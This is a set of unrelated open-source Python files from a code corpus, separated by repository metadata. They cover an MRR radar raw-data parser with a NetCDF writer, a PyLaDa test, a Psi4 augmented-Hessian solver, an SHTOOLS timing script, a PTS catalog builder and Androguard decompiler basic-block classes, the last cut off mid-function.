# go through file and make a dictionary with timestamp as key and all corresponding lines of data as values
dataMRR = {}
prevDate = 0
tmpList = list()
# preset, is changed in 8 lines if required
fileFormat = "new"
for line in allData:
if line[0:2] == "T:" or line[0:3] == "MRR":
if i != 0:
dataMRR[prevDate] = tmpList
tmpList = []
if line[0:2] == "T:":
asciiDate = line[2:14] # old mrr raw data
fileFormat = "old" # if there
elif line[0:4] == "MRR ":
asciiDate = line[4:16] # new mrr raw spectra
else:
raise IOError("must be either new or old file format!")
# Script wants UTC!
date = datetime.datetime(year=2000+int(asciiDate[0:2]), month=int(asciiDate[2:4]), day=int(
asciiDate[4:6]), hour=int(asciiDate[6:8]), minute=int(asciiDate[8:10]), second=int(asciiDate[10:12]))
date = int(date2unix(date))
tmpList.append(line)
prevDate = date
else:
tmpList.append(line)
i += 1
# end for line
dataMRR[prevDate] = tmpList
allData.close()
try:
del dataMRR[0]
warnings.warn("Warning: some lines without timestamp")
except:
pass
if fileFormat == "new":
startIndex = 3
elif fileFormat == "old":
startIndex = 6
else:
raise IOError("must be either new or old file format!")
if debugLimit == 0:
debugLimit = len(list(dataMRR.keys()))
specLength = debugLimit - debugStart
# create arrays for data
rawSpectra = np.ones((specLength, 32, 64), dtype=int)*np.nan
rawTimestamps = np.array(np.sort(list(dataMRR.keys()))[
debugStart:debugLimit], dtype=int)
rawHeights = np.ones((specLength, 32), dtype=int)*np.nan
rawTFs = np.ones((specLength, 32), dtype=float)*np.nan
rawNoSpec = np.zeros(specLength, dtype=int)
# default value - if the whole file is processed without ever setting mrrRawCC, this
# means the file is not usable for Ze calculations, but there is no workaround there.
self.mrrRawCC = 0
# go through timestamps and fill up arrays
for t, timestamp in enumerate(rawTimestamps):
dataSet = dataMRR[timestamp]
for dataLine in dataSet:
if dataLine[0:2] == "T:" or dataLine[0:3] == "MRR":
# store the first or second header line as an example, but parse every one
# to check for the CC and number of spectra variables. The first header line
# of MRR data might be messed up after starting the MRR, so the second one
# is used if available.
if t in [0, 1]:
self.header = dataLine
headerLineCC, headerLineNumSpectra, timezone = self.parseHeaderLine(
dataLine, fileFormat)
if headerLineCC is not None:
self.mrrRawCC = headerLineCC
if headerLineNumSpectra is not None:
rawNoSpec[t] = headerLineNumSpectra
else:
# if fileFormat is "old", then the default value must always be taken;
# otherwise, use the value from the headerLine, if present, otherwise
# print a warning, since that means the headerLine had a problem.
if fileFormat == "new":
warnings.warn(
'Warning, could not read number of Spectra, taking default instead: ' + str(self.defaultSpecPer10Sec))
rawNoSpec[t] = self.defaultSpecPer10Sec
if self.timezone is None:
self.timezone = timezone
else:
assert self.timezone == timezone
continue # print timestamp
elif dataLine[0:3] == "M:h" or dataLine[0] == "H":
rawHeights[t, :] = splitMrrRawData(
dataLine, timestamp, int, startIndex)
continue # print "H"
elif dataLine[0:4] == "M:TF" or dataLine[0:2] == "TF":
rawTFs[t, :] = splitMrrRawData(
dataLine, timestamp, float, startIndex)
continue # print "TF"
elif dataLine[0:3] == "M:f" or dataLine[0] == "F":
try:
if fileFormat == "old":
specBin = int(dataLine[3:5])
else:
specBin = int(dataLine[1:3])
except:
warnings.warn("######### Warning, Corrupt data header at " + str(
unix2date(timestamp)) + ", " + str(timestamp) + ", " + dataLine+" #########")
continue
rawSpectra[t, :, specBin] = splitMrrRawData(
dataLine, timestamp, int, startIndex)
continue
elif (dataLine[0:2] == "C:") or (dataLine[0:2] == "R:"):
continue
else:
warnings.warn("? Line not recognized:" + dataLine)
# end for t,timestamp
# discard spectra which are only partly valid!
rawSpectra[np.any(np.isnan(rawSpectra), axis=2)] = np.nan
rawSpectra[np.any(np.isnan(rawTFs), axis=1)] = np.nan
rawSpectra[np.any(np.isnan(rawHeights), axis=1)] = np.nan
rawTFs[np.any(np.isnan(rawTFs), axis=1)] = np.nan
rawHeights[np.any(np.isnan(rawHeights), axis=1)] = np.nan
# join arrays of different days
try:
self.mrrRawHeight = np.concatenate(
(self.mrrRawHeight, rawHeights), axis=0)
self.mrrRawTime = np.concatenate(
(self.mrrRawTime, rawTimestamps), axis=0)
self.mrrRawTF = np.concatenate((self.mrrRawTF, rawTFs), axis=0)
self.mrrRawSpectrum = np.concatenate(
(self.mrrRawSpectrum, rawSpectra), axis=0)
self.mrrRawNoSpec = np.concatenate(
(self.mrrRawNoSpec, rawNoSpec), axis=0)
except AttributeError:
self.mrrRawHeight = rawHeights
self.mrrRawTime = rawTimestamps
self.mrrRawTF = rawTFs
self.mrrRawSpectrum = rawSpectra
self.mrrRawNoSpec = rawNoSpec
# end try
# end for f,file
if not foundAtLeastOneFile:
raise UnboundLocalError("No files found: " + str(fname))
try:
self.header
except:
print("did not find any MRR data in file!")
raise IOError("did not find any MRR data in file!")
del rawHeights, rawTimestamps, rawTFs, rawSpectra
if maskData:
self.mrrRawHeight = np.ma.masked_array(
self.mrrRawHeight, np.isnan(self.mrrRawHeight))
self.mrrRawTime = np.ma.masked_array(
self.mrrRawTime, np.isnan(self.mrrRawTime))
self.mrrRawTF = np.ma.masked_array(
self.mrrRawTF, np.isnan(self.mrrRawTF))
self.mrrRawSpectrum = np.ma.masked_array(
self.mrrRawSpectrum, np.isnan(self.mrrRawSpectrum))
self.shape2D = np.shape(self.mrrRawHeight)
self.shape3D = np.shape(self.mrrRawSpectrum)
# end def __init__
@staticmethod
def parseHeaderLine(headerLine, fileFormat):
'''
Parses the raw data header line.
Tries to parse according to the fileFormat ("old", or "new")
Prints a warning if unsuccessful.
'''
tokens = headerLine.split()
CC = None
numSpectra = None
try:
idx = tokens.index('CC')
except:
warnings.warn('Warning, could not find Keyword CC in :'+headerLine)
else:
try:
CC = int(tokens[idx+1])
except:
warnings.warn('Warning, could not read CC in: ' + headerLine)
if fileFormat == "new":
if not tokens[2].startswith("UTC"):
raise IOError("ERROR, timestring must start with UTC!")
timezone = tokens[2]
if tokens[-1] != "RAW":
raise IOError("Was expecting MRR RAW DATA, found: "+tokens[-1])
try:
idx = tokens.index('MDQ')
except:
warnings.warn(
'Warning, could not find Keyword MDQ in :'+headerLine)
else:
try:
numSpectra = int(tokens[idx+2])
except:
warnings.warn(
'Warning, could not read number of Spectra: in ' + headerLine)
elif fileFormat == "old":
if tokens[1] != "UTC":
raise IOError("ERROR, time must be UTC!")
timezone = tokens[1]
else:
raise IOError("must be either new or old file format!")
return CC, numSpectra, timezone
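# Illustrative only -- a schematic (not verbatim) new-format header such as
#   "MRR 170101000000 UTC ... CC 2000000 MDQ 100 58 ... RAW"
# would yield CC=2000000, numSpectra=58 (the second token after 'MDQ') and
# timezone='UTC'.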
def writeNetCDF(self, fileOut, author="IMProToo", description="MRR Raw Data", ncForm='NETCDF3_CLASSIC'):
'''
writes MRR raw Data into Netcdf file
@parameter fileOut (str): netCDF file name
@parameter author (str): Author for netCDF meta data (default:IMProToo)
@parameter description (str): Description for NetCDF Metadata (default: "MRR Raw Data")
@parameter ncForm (str): netCDF format, possible values are NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4 for the python-netcdf4 package; NETCDF3 takes the "old" Scientific.IO.NetCDF module, which is a bit more convenient to install, or python-netcdf3 as a fall-back option
'''
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fileOut, "w", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fileOut, "w")
print("writing %s ..." % (fileOut))
# Attributes
cdfFile.history = 'Created ' + str(time.ctime(time.time()))
cdfFile.source = 'Created by '+author + ' with IMProToo v' + __version__
cdfFile.mrrHeader = self.header
cdfFile.description = description
cdfFile.mrrCalibrationConstant = self.mrrRawCC
fillVDict = dict()
# little cheat to avoid hundreds of if, else...
if pyNc:
fillVDict["fill_value"] = self.missingNumber
# Dimensions
cdfFile.createDimension('MRR rangegate', 32)
cdfFile.createDimension('time', None) # allows Multifile read
cdfFile.createDimension('MRR spectralclass', 64)
nc_times = cdfFile.createVariable(
'MRR time', 'i', ('time',), **fillVDict)
nc_ranges = cdfFile.createVariable(
'MRR rangegate', 'f', ('time', 'MRR rangegate',))
nc_classes = cdfFile.createVariable(
'MRR spectralclass', 'i', ('MRR spectralclass',), **fillVDict)
nc_times.units = 'seconds since 1970-01-01 00:00:00'
nc_times.timezone = self.timezone
nc_ranges.units = 'm'
nc_classes.units = 'none'
# Create Variables
nc_tf = cdfFile.createVariable(
'MRR_TF', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_tf.units = 'none'
nc_spectra = cdfFile.createVariable(
'MRR_Spectra', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_spectra.units = 'none'
nc_noSpec = cdfFile.createVariable(
'MRR_NoSpectra', 'i', ('time',), **fillVDict)
nc_noSpec.units = 'none'
# fill dimensions
nc_classes[:] = np.array(np.arange(0, 64, 1), dtype="i4")
nc_times[:] = np.array(self.mrrRawTime, dtype="i4")
nc_ranges[:] = np.array(self.mrrRawHeight, dtype="f4")
# fill data
nc_tf[:] = np.array(self.mrrRawTF, dtype="f4")
nc_spectra[:] = np.array(self.mrrRawSpectrum, dtype="f4")
nc_noSpec[:] = np.array(self.mrrRawNoSpec, dtype="i4")
# commented because of Ubuntu bug: https://bugs.launchpad.net/ubuntu/+source/python-scientific/+bug/1005571
# if not pyNc:
#nc_noSpec._FillValue =int(self.missingNumber)
#nc_spectra._FillValue =float(self.missingNumber)
#nc_tf._FillValue =float(self.missingNumber)
#nc_ranges._FillValue =float(self.missingNumber)
cdfFile.close()
print("done")
# end def writeNetCDF
# end class mrrRawData
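# A minimal usage sketch for mrrRawData (file names are hypothetical):
#
#   raw = mrrRawData("mrr_raw_0101.gz")  # gzip, plain ascii and wildcards work
#   raw.writeNetCDF("mrr_raw_0101.nc", author="me")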
|
maahn/IMProToo
|
IMProToo/core.py
|
Python
|
gpl-3.0
| 135,969
|
[
"NetCDF"
] |
1c0e3304e6ebd00c51802cffbf02e9d75f2b984f25c87566924844e9c1516cf4
|
###############################
# This file is part of PyLaDa.
#
# Copyright (C) 2013 National Renewable Energy Lab
#
# PyLaDa is a high throughput computational platform for Physics. It aims to make it easier to submit
# large numbers of jobs on supercomputers. It provides a python interface to physical input, such as
# crystal structures, as well as to a number of DFT (VASP, CRYSTAL) and atomic potential programs. It
# is able to organise and launch computational jobs on PBS and SLURM.
#
# PyLaDa is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# PyLaDa is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along with PyLaDa. If not, see
# <http://www.gnu.org/licenses/>.
###############################
def test_system():
from pylada.crystal import Structure
from pylada.vasp import Vasp
a = Vasp()
b = Structure()
assert a.system is None
assert a._input['system'].keyword == 'system'
assert a._input['system'].output_map(vasp=a, structure=b) is None
a.system = 'system'
assert a.system == 'system'
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'system'
b.name = 'hello'
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'system: hello'
a.system = None
assert a.system is None
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'hello'
a.system = None
assert a.system is None
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'hello'
|
pylada/pylada-light
|
tests/vasp/test_system.py
|
Python
|
gpl-3.0
| 2,246
|
[
"CRYSTAL",
"VASP"
] |
69d991cd24fdf9d9dc42a024c877578d225e50fdb370913341ebf1b6464a6875
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import numpy as np
import os
from psi4 import core
from psi4.driver import p4util
from psi4.driver.p4util.exceptions import *
# np.set_printoptions(precision=5, linewidth=200, threshold=2000, suppress=True)
def ah_iteration(mcscf_obj, tol=1e-3, max_iter=15, lindep=1e-14, print_micro=True):
"""
Solve the generalized eigenvalue problem:
| 0, g.T | | 1/l | = | 1/l |
| g, H/l | | X | = e | X |
Where g is the gradient, H is the orbital Hessian, X is our orbital update step,
and l is the eigenvalue.
In some ways this is the subspace reduction of the full MCSCF Hessian where the
CC part has been solved exactly. When this occurs the OC and CO elements collapse
to the above and the CC Hessian becomes diagonally dominant.
We can solve this through Davidson iterations where we condition the edges. It's the
Pulay equations all over again, just iterative.
Watch out for lambdas that are zero. Looking for the lambda that is ~1.
"""
# Unpack information
orb_grad = mcscf_obj.gradient()
precon = mcscf_obj.H_approx_diag()
approx_step = mcscf_obj.approx_solve()
orb_grad_ssq = orb_grad.sum_of_squares()
# Gears
min_lambda = 0.3
converged = False
warning_neg = False
warning_mult = False
fullG = np.zeros((max_iter + 2, max_iter + 2))
fullS = np.zeros((max_iter + 2, max_iter + 2))
fullS[np.diag_indices_from(fullS)] = 1
guesses = []
sigma_list = []
guesses.append(approx_step)
sigma_list.append(mcscf_obj.compute_Hk(approx_step))
if print_micro:
core.print_out("\n Eigenvalue Rel dE dX \n")
# Run Davidson look for lambda ~ 1
old_val = 0
for microi in range(1, max_iter + 1):
# Gradient
fullG[0, microi] = guesses[-1].vector_dot(orb_grad)
for i in range(microi):
fullG[i + 1, microi] = guesses[-1].vector_dot(sigma_list[i])
fullS[i + 1, microi] = guesses[-1].vector_dot(guesses[i])
fullG[microi] = fullG[:, microi]
fullS[microi] = fullS[:, microi]
wlast = old_val
# Slice out relevant S and G
S = fullS[:microi + 1, :microi + 1]
G = fullG[:microi + 1, :microi + 1]
# Solve Gv = lSv
v, L = np.linalg.eigh(S)
mask = v > (np.min(np.abs(v)) * 1.e-10)
invL = L[:, mask] * (v[mask] ** -0.5)
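# invL orthonormalizes the (possibly linearly dependent) subspace basis via
# canonical orthogonalization; overlap eigenvalues below the mask threshold
# are dropped to keep S**-1/2 well conditioned.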
# Solve in S basis, rotate back
evals, evecs = np.linalg.eigh(np.dot(invL.T, G).dot(invL))
vectors = np.dot(invL, evecs)
# Figure out the right root to follow
if np.sum(np.abs(vectors[0]) > min_lambda) == 0:
raise PsiException("Augmented Hessian: Could not find the correct root!\n"\
"Try starting AH when the MCSCF wavefunction is more converged.")
if np.sum(np.abs(vectors[0]) > min_lambda) > 1 and not warning_mult:
core.print_out(" Warning! Multiple eigenvectors found to follow. Following closest to \lambda = 1.\n")
warning_mult = True
idx = (np.abs(1 - np.abs(vectors[0]))).argmin()
lam = abs(vectors[0, idx])
subspace_vec = vectors[1:, idx]
# Negative roots should go away?
if idx > 0 and evals[idx] < -5.0e-6 and not warning_neg:
core.print_out(' Warning! AH might follow negative eigenvalues!\n')
warning_neg = True
diff_val = evals[idx] - old_val
old_val = evals[idx]
new_guess = guesses[0].clone()
new_guess.zero()
for num, c in enumerate(subspace_vec / lam):
new_guess.axpy(c, guesses[num])
# Build estimated sigma vector
new_dx = sigma_list[0].clone()
new_dx.zero()
for num, c in enumerate(subspace_vec):
new_dx.axpy(c, sigma_list[num])
# Consider restraints
new_dx.axpy(lam, orb_grad)
new_dx.axpy(old_val * lam, new_guess)
norm_dx = (new_dx.sum_of_squares() / orb_grad_ssq) ** 0.5
if print_micro:
core.print_out(" AH microiter %2d % 18.12e % 6.4e % 6.4e\n" % (microi, evals[idx],
diff_val / evals[idx], norm_dx))
if abs(old_val - wlast) < tol and norm_dx < (tol ** 0.5):
converged = True
break
# Apply preconditioner
tmp = precon.clone()
val = tmp.clone()
val.set(evals[idx])
tmp.subtract(val)
new_dx.apply_denominator(tmp)
guesses.append(new_dx)
sigma_list.append(mcscf_obj.compute_Hk(new_dx))
if print_micro and converged:
core.print_out("\n")
# core.print_out(" AH converged! \n\n")
#if not converged:
# core.print_out(" !Warning. Augmented Hessian did not converge.\n")
new_guess.scale(-1.0)
return converged, microi, new_guess
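# A tiny dense sketch of the bordered eigenproblem that the loop above solves
# iteratively (illustrative numbers, independent of psi4):
#   g = np.array([0.1, -0.2])                    # gradient
#   H = np.diag([1.0, 2.0])                      # orbital Hessian
#   A = np.block([[0.0, g[None, :]], [g[:, None], H]])
#   e, V = np.linalg.eigh(A)
#   idx = np.argmin(np.abs(1 - np.abs(V[0])))    # root closest to lambda = 1
#   step = V[1:, idx] / V[0, idx]                # orbital update X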
|
rmcgibbo/psi4public
|
psi4/driver/procrouting/mcscf/augmented_hessian.py
|
Python
|
lgpl-3.0
| 5,838
|
[
"Psi4"
] |
673a2352347b008e9b990061992b7a3fb430d0ab8580128e414f536d43e7c4e1
|
#!/usr/bin/env python
"""
This script is a python version of TimingAccuracyGLQ. We use numpy functions to
simplify the creation of random coefficients.
"""
from __future__ import absolute_import, division, print_function
import os
import sys
import time
import numpy as np
sys.path.append(os.path.join(os.path.dirname(__file__), "../../.."))
from pyshtools import shtools
# ==== MAIN FUNCTION ====
def main():
TimingAccuracyGLQ()
# ==== TEST FUNCTIONS ====
def TimingAccuracyGLQ():
# ---- input parameters ----
maxdeg = 2800
ls = np.arange(maxdeg + 1)
beta = 1.5
print('Gauss-Legendre quadrature (real)')
# ---- create mask to filter out m<=l ----
mask = np.zeros((2, maxdeg + 1, maxdeg + 1), dtype=bool)
mask[0, 0, 0] = True
for l in ls:
mask[:, l, :l + 1] = True
mask[1, :, 0] = False
# ---- create Gaussian powerlaw coefficients ----
print('creating {:d} random coefficients'.format(2 * (maxdeg + 1) *
(maxdeg + 1)))
cilm = np.random.normal(loc=0., scale=1., size=(2, maxdeg + 1, maxdeg + 1))
cilm[:, 1:, :] *= np.sqrt((ls[1:]**beta) /
(2. * ls[1:] + 1.))[None, :, None]
old_power = shtools.SHPowerSpectrum(cilm)
new_power = 1. / (1. + ls)**beta # initialize degrees > 0 to power-law
cilm[:, :, :] *= np.sqrt(new_power / old_power)[None, :, None]
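# After this degree-wise rescaling the realized power spectrum follows the
# target 1/(1+l)**beta; the earlier l**beta scaling only sets a reasonable
# starting distribution.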
cilm[~mask] = 0.
# ---- time spherical harmonics transform for lmax set to increasing
# ---- powers of 2
lmax = 2
print('lmax maxerror rms tprecompute tinverse tforward')
while lmax <= maxdeg:
# trim coefficients to lmax
cilm_trim = cilm[:, :lmax + 1, :lmax + 1]
mask_trim = mask[:, :lmax + 1, :lmax + 1]
# precompute grid nodes and associated Legendre functions
tstart = time.time()
zeros, weights = shtools.SHGLQ(lmax)
tend = time.time()
tprecompute = tend - tstart
# synthesis / inverse
tstart = time.time()
grid = shtools.MakeGridGLQ(cilm_trim, zeros)
tend = time.time()
tinverse = tend - tstart
# analysis / forward
tstart = time.time()
cilm2_trim = shtools.SHExpandGLQ(grid, weights, zeros)
tend = time.time()
tforward = tend - tstart
# compute error
err = np.abs(cilm_trim[mask_trim] - cilm2_trim[mask_trim]) / \
np.abs(cilm_trim[mask_trim])
maxerr = err.max()
rmserr = np.mean(err**2)
print('{:4d} {:1.2e} {:1.2e} {:1.1e}s {:1.1e}s '
'{:1.1e}s'.format(lmax, maxerr, rmserr, tprecompute, tinverse,
tforward))
lmax = lmax * 2
# ==== EXECUTE SCRIPT ====
if __name__ == "__main__":
main()
|
heroxbd/SHTOOLS
|
examples/python/TimingAccuracy/TimingAccuracyGLQ.py
|
Python
|
bsd-3-clause
| 2,830
|
[
"Gaussian"
] |
681b244b9dde11a73e0a485010cbc0b92064790ec2c2487803ad6aeaf92f9e9a
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.catalogbuilder Contains the CatalogBuilder class.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ...core.basics.configurable import OldConfigurable
from ...core.tools import tables
# -----------------------------------------------------------------
class CatalogBuilder(OldConfigurable):
"""
This class builds galactic and stellar catalogs from the output of the galaxy, star and trained extractors.
"""
def __init__(self, config=None):
"""
The constructor ...
:param config:
:return:
"""
# Call the constructor of the base class
super(CatalogBuilder, self).__init__(config, "magic")
# The image frame
self.frame = None
# References to the extractors
self.galaxy_extractor = None
self.star_extractor = None
self.trained_extractor = None
# The output catalogs
self.galactic_catalog = None
self.stellar_catalog = None
# -----------------------------------------------------------------
def run(self, frame, galaxy_extractor, star_extractor, trained_extractor):
"""
Run the catalog builder: set up the references, build the catalogs and write them out.
:param frame:
:param galaxy_extractor:
:param star_extractor:
:param trained_extractor:
:return:
"""
# 1. Call the setup function
self.setup(frame, galaxy_extractor, star_extractor, trained_extractor)
# 2. Build the catalog
self.build()
# 3. Writing
self.write()
# -----------------------------------------------------------------
def clear(self):
"""
This function ...
:return:
"""
# Set attributes to None
self.frame = None
self.galaxy_extractor = None
self.star_extractor = None
self.trained_extractor = None
# -----------------------------------------------------------------
def setup(self, frame, galaxy_extractor, star_extractor, trained_extractor):
"""
This function ...
:param frame:
:param galaxy_extractor:
:param star_extractor:
:param trained_extractor:
:return:
"""
# Call the setup function of the base class
super(CatalogBuilder, self).setup()
# The frame
self.frame = frame
# References to the extractors
self.galaxy_extractor = galaxy_extractor
self.star_extractor = star_extractor
self.trained_extractor = trained_extractor
# -----------------------------------------------------------------
def build(self):
"""
This function ...
:return:
"""
# Build the galactic catalog
self.build_galactic_catalog()
# Build the stellar catalog
self.build_stellar_catalog()
# -----------------------------------------------------------------
def build_galactic_catalog(self):
"""
This function ...
:return:
"""
# Set galactic catalog (no merging with trained extractor (yet) and undetected galaxies are included anyway)
self.galactic_catalog = self.galaxy_extractor.catalog
# -----------------------------------------------------------------
def build_stellar_catalog(self):
"""
Merge the stars found by the star extractor and by the trained extractor into one stellar catalog.
:return:
"""
# Initialize columns
catalog_column = []
id_column = []
ra_column = []
dec_column = []
ra_error_column = []
dec_error_column = []
confidence_level_column = []
on_galaxy_column = []
original_id_column = []
# Append stars from the star extractor; loop over the stellar statistics
for i in range(len(self.star_extractor.statistics)):
# Get the index of this star in the input catalog used by the star extractor
index = self.star_extractor.statistics["Star index"][i]
# Skip undetected stars
if not self.star_extractor.statistics["Detected"][i]: continue
# Add the appropriate values in the columns
catalog_column.append(self.star_extractor.catalog["Catalog"][index] if not (hasattr(self.star_extractor.catalog["Catalog"], "mask") and self.star_extractor.catalog["Catalog"].mask[index]) else None)
id_column.append(self.star_extractor.catalog["Id"][index] if not (hasattr(self.star_extractor.catalog["Id"], "mask") and self.star_extractor.catalog["Id"].mask[index]) else None)
ra_column.append(self.star_extractor.catalog["Right ascension"][index])
dec_column.append(self.star_extractor.catalog["Declination"][index])
ra_error_column.append(self.star_extractor.catalog["Right ascension error"][index])
dec_error_column.append(self.star_extractor.catalog["Declination error"][index])
confidence_level_column.append(self.star_extractor.catalog["Confidence level"][index])
on_galaxy_column.append(self.star_extractor.catalog["On galaxy"][index])
original_id_column.append(None)
#position_error = 0.5 * self.frame.average_pixelscale.to("mas/pix").value # in mas !!
x_position_error = 0.5 * self.frame.pixelscale.x.to("mas/pix").value
y_position_error = 0.5 * self.frame.pixelscale.y.to("mas/pix").value
# Append stars from the trained extractor; loop over the stars found by the trained extractor
for star in self.trained_extractor.stars:
# Add the appropriate values in the columns
catalog_column.append(None)
id_column.append(None)
ra_column.append(star.position.ra.value)
dec_column.append(star.position.dec.value)
ra_error_column.append(x_position_error)
dec_error_column.append(y_position_error)
confidence_level_column.append(star.confidence_level)
on_galaxy_column.append(False)
original_id_column.append(None)
data = [catalog_column, id_column, ra_column, dec_column, ra_error_column, dec_error_column, confidence_level_column,
on_galaxy_column, original_id_column]
names = ['Catalog', 'Id', 'Right ascension', 'Declination', 'Right ascension error', 'Declination error', 'Confidence level',
'On galaxy', 'Original catalog and id']
# Create the merged stellar catalog
self.stellar_catalog = tables.new(data, names)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Write the galactic catalog
self.write_galactic_catalog()
# Write the stellar catalog
self.write_stellar_catalog()
# -----------------------------------------------------------------
def write_galactic_catalog(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
def write_stellar_catalog(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
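# A minimal usage sketch (inputs are assumed to come from the magic pipeline;
# names here are illustrative):
#
#   builder = CatalogBuilder()
#   builder.run(frame, galaxy_extractor, star_extractor, trained_extractor)
#   builder.galactic_catalog  # catalog taken from the galaxy extractor
#   builder.stellar_catalog   # merged stellar catalog table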
|
Stargrazer82301/CAAPR
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/builder.py
|
Python
|
mit
| 7,693
|
[
"Galaxy"
] |
17c2a23204e27876d6cc1aa42c0b6e4753e694874fbc34cadcf0ea665b0f5a75
|
# This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <geoffroy.gueguen@gmail.com>
# All Rights Reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import logging
from androguard.decompiler.dad.opcode_ins import INSTRUCTION_SET
from androguard.decompiler.dad.instruction import Variable
from androguard.decompiler.dad.node import Node
logger = logging.getLogger('dad.basic_blocks')
class BasicBlock(Node):
def __init__(self, name, block_ins):
super(BasicBlock, self).__init__(name)
self.ins = block_ins
self.ins_range = None
self.loc_ins = None
def get_ins(self):
return self.ins
def get_loc_with_ins(self):
if self.loc_ins is None:
self.loc_ins = zip(range(*self.ins_range), self.ins)
return self.loc_ins
def remove_ins(self, loc, ins):
self.ins.remove(ins)
self.loc_ins.remove((loc, ins))
def add_ins(self, new_ins_list):
for new_ins in new_ins_list:
self.ins.append(new_ins)
self.ins_range[1] += len(new_ins_list)
def number_ins(self, num):
last_ins_num = num + len(self.ins)
self.ins_range = [num, last_ins_num]
self.loc_ins = None
return last_ins_num
class StatementBlock(BasicBlock):
def __init__(self, name, block_ins):
super(StatementBlock, self).__init__(name, block_ins)
def visit(self, visitor):
return visitor.visit_statement_node(self)
def __str__(self):
return '%d-Statement(%s)' % (self.num, self.name)
class ReturnBlock(BasicBlock):
def __init__(self, name, block_ins):
super(ReturnBlock, self).__init__(name, block_ins)
def visit(self, visitor):
return visitor.visit_return_node(self)
def __str__(self):
return '%d-Return(%s)' % (self.num, self.name)
class ThrowBlock(BasicBlock):
def __init__(self, name, block_ins):
super(ThrowBlock, self).__init__(name, block_ins)
def visit(self, visitor):
return visitor.visit_throw_node(self)
def __str__(self):
return '%d-Throw(%s)' % (self.num, self.name)
class SwitchBlock(BasicBlock):
def __init__(self, name, switch, block_ins):
super(SwitchBlock, self).__init__(name, block_ins)
self.switch = switch
self.cases = []
self.default = None
self.node_to_case = {}
def add_case(self, case):
self.cases.append(case)
def visit(self, visitor):
return visitor.visit_switch_node(self)
def copy_from(self, node):
super(SwitchBlock, self).copy_from(node)
self.cases = node.cases
self.switch = node.switch
def update_attribute_with(self, n_map):
super(SwitchBlock, self).update_attribute_with(n_map)
self.cases = [n_map.get(n, n) for n in self.cases]
for node1, node2 in n_map.iteritems():
if node1 in self.node_to_case:
self.node_to_case[node2] = self.node_to_case.pop(node1)
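# If the switch has fewer literal case values than successor nodes, the
# extra (first) successor is the fall-through default branch.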
def order_cases(self):
values = self.switch.get_values()
if len(values) < len(self.cases):
self.default = self.cases.pop(0)
for case, node in zip(values, self.cases):
self.node_to_case.setdefault(node, []).append(case)
def __str__(self):
return '%d-Switch(%s)' % (self.num, self.name)
class CondBlock(BasicBlock):
def __init__(self, name, block_ins):
super(CondBlock, self).__init__(name, block_ins)
self.true = None
self.false = None
def set_true(self, node):
self.true = node
def set_false(self, node):
self.false = node
def update_attribute_with(self, n_map):
super(CondBlock, self).update_attribute_with(n_map)
self.true = n_map.get(self.true, self.true)
self.false = n_map.get(self.false, self.false)
def neg(self):
if len(self.ins) > 1:
raise RuntimeError('Condition should have only 1 instruction!')
self.ins[0].neg()
def visit(self, visitor):
return visitor.visit_cond_node(self)
def visit_cond(self, visitor):
if len(self.ins) > 1:
raise RuntimeError('Condition should have only 1 instruction!')
return visitor.visit_ins(self.ins[0])
def __str__(self):
return '%d-If(%s)' % (self.num, self.name)
class Condition(object):
def __init__(self, cond1, cond2, isand, isnot):
self.cond1 = cond1
self.cond2 = cond2
self.isand = isand
self.isnot = isnot
def neg(self):
self.isand = not self.isand
self.cond1.neg()
self.cond2.neg()
def get_ins(self):
lins = []
lins.extend(self.cond1.get_ins())
lins.extend(self.cond2.get_ins())
return lins
def get_loc_with_ins(self):
loc_ins = []
loc_ins.extend(self.cond1.get_loc_with_ins())
